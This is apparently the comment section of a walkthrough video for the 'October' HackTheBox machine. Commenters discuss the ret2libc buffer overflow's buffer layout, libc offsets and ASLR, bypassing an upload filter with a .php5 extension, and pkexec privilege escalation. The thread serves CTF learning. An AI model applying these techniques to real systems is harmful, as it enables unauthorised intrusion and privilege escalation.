Hey, just wanted to say thanks for making these videos. They're super helpful for getting a nice understanding of the general steps in hacking. Plus, they're quite entertaining too. Keep it up!
I really do admire how you walk through the box as if its your first time. Showing typical things that you know may be tried and explain WHY it didn't work. Its hard to teach this stuff, but your videos really do help with knowing what to look for and becoming more observant when performing system reconnaissance. Great Job as always...please keep it up :) !
Pretty sure this one was hard for those who have never worked on Buffer Overflows. Luckily I covered the basics before going into this video. You can also update the description at 21:15 as it says "Pattner_create". Loved this video.
I clapped when you got root! I’ve done a small bit of malware analysis and got to learn about the CPU, Memory and assembly, but all without ASLR or DEP. I didn’t quite understand what you were doing with the system and offsets but going to do some more research tonight. Cheers!
I have a question even though it seems stupid lol. If you had set an environment variable with shellcode and looked at the stack to find its location, and then used it to activate the shell, would it have worked?
I did not play the box and do not know how much code the binary contains but to avoid bruteforcing the libc address I would have examined the binary if there are all the necessary gadgets for a rop chain
I think you can, and I misspoke. Just one of those things I avoid because doing it this way screws up how keyboard hotkeys work for that window and I don't want it to mess with my other tmux windows. So I play it safe and keep the window i screw with isolated, that way I can just close it when I'm done.
Good stuff. One thing I'd do differently is use diff recursively instead of md5ing stuff. Shows the exact difference between files when they differ by default, but can also be turned off, along with excluding files. Check out pwndbg for gdb too - peda works, but hasn't been active for years.
Seems you found out in bitterman how to create a pattern from inside of gdb peda, maybe that's worth mentioning here so that people don't go look for the one from msf :)
Hi IppSec, After watching this week box I came back to October for the BO, I just have a question. On 32:51 you can see the full exploit that actually pops up the /bin/sh. However, on 43:30 the buffer is different. Your buffer on 32:51 would be (112 A's + System_addr + exit_addr + arg_addr) Your buffer on 43:30 would be (112 A's + libc_base_addr + System_addr + libc_base_addr + exit_addr + libc_base_addr + arg_addr) My educated guess is, because everytime you run System_addr or exi_addr it needs to go to libc_base_addr in order to run the next instruction?
I know it's an old comment, but will reply anyways. What he does is adding offsets to the base adrress number so System_addr = libc_base_add + system_off and while System_addr and libc_base_addr are addresses system_off is not, it tells you something like "how far after beggining of libc base address the system address is" so in order to calculate System_addr you need to add that offset number to the base address the same way as you add decimal numbers (1 + 1 = 2) and you end up with address like 0xd3adc0d3 (still 4 bytes not 8). Later after he converts them to little endian he adds them to buffer, but python knows that left operand (buff) is string so he treats the right ones so System_addr etc. like characters and appends them to the buff string (you can see them when he tests out the script on october before editing it and prints out the buff)
at around 15:00 minutes you switched to an ubuntu vm to run a gdb and see where the programs crashes... why did you switch machines rather than just use kali? thanks for the vids mans, really helping me learn alot!
I have one doubt but it's not related to this video, If you see in submissions list in htb website , Egotistical submitted one easy box,he only tested it and rejected it. I didn't understand ,could you tell me if you knew
Hey, at circa 6:30 in, I'm not sure why you excluded the php files? Surely you were looking for changes in the source code, and the php files are the source code in this instance? So you may have missed a "2 md5sum ./filename.php" ?
Yeah I get that, but you were comparing the php files downloaded from two different versions of the source code? I'm probably missing something (like "the point"). It's minor in the grand scheme... I'm still working through this video and it's awesome. Have watched it through once, and now following step by step on the retired machine. Thank you for all your time and effort :-)
The portion of the video you’re referring to is me trying to identify what version of software the web server is running. If you know the version is X revisions behind you can look at all the change logs to see if they fixed any security issues. I don’t believe I ever use the php files, I exclude them
Been forever since i did the video but libc contains the string /bin/sh. That string will exist in a ton of places as it's pretty common, however, the majority of the memory space is unknown to us. We know LibC's structure so we make educated guesses to where libc, if we are correct we can piece together everything else using the one known as a pivot point... Watch my Bitterman video, it should be a big help.
@@ippsec I watched bitterman and that was another great look at BOF. THANK YOU! So /bin/sh can be found in glibc because glibc is back end for most core Linux functionality? So could I find just about every /bin/* or /sbin/* program in glibc?
Hi IppSec, I really wanted to thank you for all these videos, so much knowledge inside, keep it up! Just a small question please ; at 25:35, I just can't understand the content (arranged in columns and lines) of the stack display area in PEDA / gdb... I don't understand, I see stack addresses (data in blue) with chaining arrow, etc... If someone could quickly explain this to me, that would be great! Thanks again
Thanks for your help IppSec! I've already understood that. In fact I was talking only about the bottom area representing the stack. There are some arrows between stack adresses represented like this --> and I don't get what does it mean...
@@jonathanvincent5812 don't know for sure, but my guess is one arrow is the stack pointer, i.e. the current "top" of the stack and the other is the base pointer, i.e. the reference pointer to which local vars and function args are accessed relative to
It doesn't make sense, make a video explaining how to write a buffer overflow And why do you had to hack the ovrflw file in order to get a shell? I know you explained the changing address thing but why do you need to crack the file ovrflw?
October blocks me from uploading any .php files using the media button even with the Admin admin account logged in. NVM I later noticed you changed the ext to .php5 didn't know you could do that ti a php ext and it would still work
hello ippsec i need your help to understand linux buffer overflows. i actually can do exe overflows with immunity debugger. but everything goes to crap when trying linux overflows. in this video you followed different pointers to exploit. but what is the difference between this box and sneaky? (ua-cam.com/video/1UGxjqTnuyo/v-deo.html). snaky is "classic" overflow and i can do it too. what makes october so complicated? aslr? why dont you just used packetstorm shellcode instead getting libc addresses? i found some sources about linux stack overflows but still got nothing. would you like to share some good sources with us? and everyone in your channel wants a buffer overflow video. do you mind to record it? for.. your.. servants? sorry for bad english -- im not native. maybe it's the reason i can't find good source for bofs. thank you
IppSec i was on kali linux 64 with ASLR off, the exploit worked after getting the glibc offset on proc maps instead of with ldd, as far as i read (after having this issue) ldd is not precize, let me know if you know a better way to get glibc offset. Linux kali 4.9.0-kali4-amd64 #1 SMP Debian 4.9.30-2kali1 (2017-06-22) x86_64 GNU/Linux btw thanks for the video, learned a lot!
Thanks for the comment. Cybrary may have what you are looking for. As far as me doing videos on "How to Hack", I don't have plans for that. It's a huge time commitment to do for free -- and honestly I don't really want my material to come up when you google "How to Hack". I understand it may sound odd as these CTF Write-Ups do show exploits but I believe the demographic that searches for CTF Write-Ups is more favored on the legitimate side of things.
Absolute animal, I always get excited watching your videos. Much appreciated.
Hey, just wanted to say thanks for making these videos. They're super helpful for getting a nice understanding of the general steps in hacking. Plus, they're quite entertaining too. Keep it up!
I really do admire how you walk through the box as if its your first time. Showing typical things that you know may be tried and explain WHY it didn't work. Its hard to teach this stuff, but your videos really do help with knowing what to look for and becoming more observant when performing system reconnaissance. Great Job as always...please keep it up :) !
I would love to see more videos on buffer overflows. Great video as always, thanks!
Great buffer overflow example
Pretty sure this one was hard for those who have never worked on Buffer Overflows. Luckily I covered the basics before going into this video. You can also update the description at 21:15 as it says "Pattner_create". Loved this video.
Thank you @ippSec. I pwned frolic using the method you show here. This was my first ROP :D Didn't think it'd be so easy!
I would like to thank you for making such awesome videos. I really appreciate your hard work and time you dedicate. Hats off to you sir.
Awesome video, after that i was able to write my first buffer_ovrflw and got root on frolic with the first shot
I clapped when you got root! I’ve done a small bit of malware analysis and got to learn about the CPU, Memory and assembly, but all without ASLR or DEP. I didn’t quite understand what you were doing with the system and offsets but going to do some more research tonight. Cheers!
Awesome video. It's so helpful to have a practical example to go with the theory.
Your videos are really awsome. I have learned a lot from it . Thanks:)
I really enjoy your videos. Thank you for the RE 101. It really helped!
1:38 This is the first time I see phtml.
As for the rest of your video, this is *way* over my head.
😂😂😂sameeee
I know this is old, but you can avoid the buffer overflow part and use pkexec privilege escalation instead
I wonder why on 28:02 the system address was off, but in 31:44 it was right? Was it because he ran 'p system' in ./ovrflw and that that changed it?
I love your videos man! Keep going, as many bof machines as possible please :)
Did you ever finish the OSCE? Also was the SANs SEC660 good class to take?
Yes to both.
Raymond from Everybody Loves Raymond is the best teacher. :) Thumbs up!
AMAZING VIDEO!!!!!!
LEARN A LOT HOW TO BUFFER OVERFLOW ON LINUX
I have a question even though it seems stupid lol.
If you had set an environment variable with shellcode and looked at the stack to find its location, and then used it to activate the shell, would it have worked?
holy crap now i am able to understand this shit !!! thanks ippsec
I did not play the box and do not know how much code the binary contains but to avoid bruteforcing the libc address I would have examined the binary if there are all the necessary gadgets for a rop chain
Followed from bitterman, this is a great stuff
Thank you for these videos! I was wondering why you couldn't use tmux to spawn an interactive shell?
I think you can, and I misspoke. Just one of those things I avoid because doing it this way screws up how keyboard hotkeys work for that window and I don't want it to mess with my other tmux windows.
So I play it safe and keep the window i screw with isolated, that way I can just close it when I'm done.
Good stuff. One thing I'd do differently is use diff recursively instead of md5ing stuff. Shows the exact difference between files when they differ by default, but can also be turned off, along with excluding files.
Check out pwndbg for gdb too - peda works, but hasn't been active for years.
Seems you found out in bitterman how to create a pattern from inside of gdb peda, maybe that's worth mentioning here so that people don't go look for the one from msf :)
Thanx ippsec. This video teached me a LOT. With this video I could get root on Frolic!!! :-)
Thank you for the video. At 9:50 i have an error, failed to daemonize, do I need to enable port forwarding? I am a noob, Thanks
The hunt to root october
Great example and walk through!
Hi IppSec,
After watching this week box I came back to October for the BO, I just have a question. On 32:51 you can see the full exploit that actually pops up the /bin/sh.
However, on 43:30 the buffer is different.
Your buffer on 32:51 would be (112 A's + System_addr + exit_addr + arg_addr)
Your buffer on 43:30 would be (112 A's + libc_base_addr + System_addr + libc_base_addr + exit_addr + libc_base_addr + arg_addr)
My educated guess is, because everytime you run System_addr or exi_addr it needs to go to libc_base_addr in order to run the next instruction?
I know it's an old comment, but will reply anyways. What he does is adding offsets to the base adrress number so System_addr = libc_base_add + system_off and while System_addr and libc_base_addr are addresses system_off is not, it tells you something like "how far after beggining of libc base address the system address is" so in order to calculate System_addr you need to add that offset number to the base address the same way as you add decimal numbers (1 + 1 = 2) and you end up with address like 0xd3adc0d3 (still 4 bytes not 8). Later after he converts them to little endian he adds them to buffer, but python knows that left operand (buff) is string so he treats the right ones so System_addr etc. like characters and appends them to the buff string (you can see them when he tests out the script on october before editing it and prints out the buff)
at around 15:00 minutes you switched to an ubuntu vm to run a gdb and see where the programs crashes... why did you switch machines rather than just use kali? thanks for the vids mans, really helping me learn alot!
Because he tried to replicate the victim machine state (version, distro, architecture) as close as possible to be able to do the buffer overflow
this gave me anxiety
lol thanks!
I have one doubt but it's not related to this video,
If you see in submissions list in htb website ,
Egotistical submitted one easy box,he only tested it and rejected it.
I didn't understand ,could you tell me if you knew
He only submitted and he only rejected it
Hey, at circa 6:30 in, I'm not sure why you excluded the php files? Surely you were looking for changes in the source code, and the php files are the source code in this instance? So you may have missed a "2 md5sum ./filename.php" ?
PHP files serve dynamic content, performing a md5sum against the physical file and one retrieved from the web server would produce different results.
Yeah I get that, but you were comparing the php files downloaded from two different versions of the source code? I'm probably missing something (like "the point"). It's minor in the grand scheme... I'm still working through this video and it's awesome. Have watched it through once, and now following step by step on the retired machine. Thank you for all your time and effort :-)
Awesome walkthrough, thank you. I'm hoping this will help prepare me for calamity, but I think there is still a lot to learn!
The portion of the video you’re referring to is me trying to identify what version of software the web server is running. If you know the version is X revisions behind you can look at all the change logs to see if they fixed any security issues. I don’t believe I ever use the php files, I exclude them
IppSec got it, makes sense, thanks. You da man!
Amazing stuff
hi ippsec do you still have the ovrflw binary? can i have it :)
Why does/would libc.so have the address location for /bin/sh in it?
Trying to understand the thought process there.
Been forever since i did the video but libc contains the string /bin/sh. That string will exist in a ton of places as it's pretty common, however, the majority of the memory space is unknown to us. We know LibC's structure so we make educated guesses to where libc, if we are correct we can piece together everything else using the one known as a pivot point... Watch my Bitterman video, it should be a big help.
@@ippsec I watched bitterman and that was another great look at BOF. THANK YOU! So /bin/sh can be found in glibc because glibc is back end for most core Linux functionality? So could I find just about every /bin/* or /sbin/* program in glibc?
@IppSec how to fix this "/bin/bash: warning: command substitution: ignored null byte in input'
Hi IppSec,
I really wanted to thank you for all these videos, so much knowledge inside, keep it up!
Just a small question please ; at 25:35, I just can't understand the content (arranged in columns and lines) of the stack display area in PEDA / gdb... I don't understand, I see stack addresses (data in blue) with chaining arrow, etc... If someone could quickly explain this to me, that would be great! Thanks again
Top is the memory registers.
Middle is the disassembled code, the arrow is what instruction the program is on
Bottom is the stack.
Thanks for your help IppSec!
I've already understood that. In fact I was talking only about the bottom area representing the stack. There are some arrows between stack adresses represented like this --> and I don't get what does it mean...
@@jonathanvincent5812 don't know for sure, but my guess is one arrow is the stack pointer, i.e. the current "top" of the stack and the other is the base pointer, i.e. the reference pointer to which local vars and function args are accessed relative to
awesome!
sir but retired machine not accessing how to do practices sir plz help me
When getting the initial shell i immediately got root. no priv esc needed for me. which was odd...
Does anyone have problem with vi on October? It's difficult to write script when I can't do vim ~/.vimrc -> no compatible
Just your increment was wrong... i+=i should've been i+=1
I was like..dude it's 1..
1..
then he ran the script.. It worked though!!
It doesn't make sense, make a video explaining how to write a buffer overflow
And why do you had to hack the ovrflw file in order to get a shell? I know you explained the changing address thing but why do you need to crack the file ovrflw?
Oh wait, it's to get root access, right?
nice video, thanks
October blocks me from uploading any .php files using the media button even with the Admin admin account logged in. NVM I later noticed you changed the ext to .php5 didn't know you could do that ti a php ext and it would still work
Why can't Ipp spawn a pty shell in a tmux session at ~18:30
Misspoke- I can was just worried doing the stty raw could have affected other panes
💗🧜♀️🧚♀️ 💗
Why does he say that he can't run the python Pty shell code on Tmux?
I'm not exactly sure, but keep in mind how old this video is. It's probably just because I didn't know to set the ROWS/COLUMNS.
@@ippsec ohhh hahah thanks!
lol i += i ??
incrementation fault :V
We never got to see whether you could exit the application after getting the flag :o
Guess you’ll have to do the box yourself :)
hello ippsec
i need your help to understand linux buffer overflows. i actually can do exe overflows with immunity debugger. but everything goes to crap when trying linux overflows.
in this video you followed different pointers to exploit. but what is the difference between this box and sneaky? (ua-cam.com/video/1UGxjqTnuyo/v-deo.html). snaky is "classic" overflow and i can do it too. what makes october so complicated? aslr? why dont you just used packetstorm shellcode instead getting libc addresses?
i found some sources about linux stack overflows but still got nothing. would you like to share some good sources with us? and everyone in your channel wants a buffer overflow video. do you mind to record it? for.. your.. servants?
sorry for bad english -- im not native. maybe it's the reason i can't find good source for bofs.
thank you
ldd ovrflw | grep libc wasnt returning the correct libc offset to the exploit to work on my "aslr off" enviroment
from googling the command ```LD_TRACE_LOADED_OBJECTS=1 /root/Desktop/hackthebox/October/bof/ovrflw | grep libc``` solved my problem
BUT i need root to run LD_TRACE_LOADED_OBJECTS=1 (looks like), any alternative commands?
ended up opening on GDB and looking on proc maps
Odd what distro of linux are you on? Also 32 or 64 bit?
IppSec i was on kali linux 64 with ASLR off, the exploit worked after getting the glibc offset on proc maps instead of with ldd, as far as i read (after having this issue) ldd is not precize, let me know if you know a better way to get glibc offset.
Linux kali 4.9.0-kali4-amd64 #1 SMP Debian 4.9.30-2kali1 (2017-06-22) x86_64 GNU/Linux
btw thanks for the video, learned a lot!
How are you able to have so smooth vms?
Probably the open-vm-tools package?
Really liked your video. Can you give some tutorial links or make some videos on the basics of exploiting.
Thanks for the comment. Cybrary may have what you are looking for. As far as me doing videos on "How to Hack", I don't have plans for that. It's a huge time commitment to do for free -- and honestly I don't really want my material to come up when you google "How to Hack".
I understand it may sound odd as these CTF Write-Ups do show exploits but I believe the demographic that searches for CTF Write-Ups is more favored on the legitimate side of things.
Hi mate, probably you may interested in "Hacking the art of exploitation" boook. Link: nostarch.com/hacking2.htm
Bro u are genius teach me Ur way
Interesing... :)
so good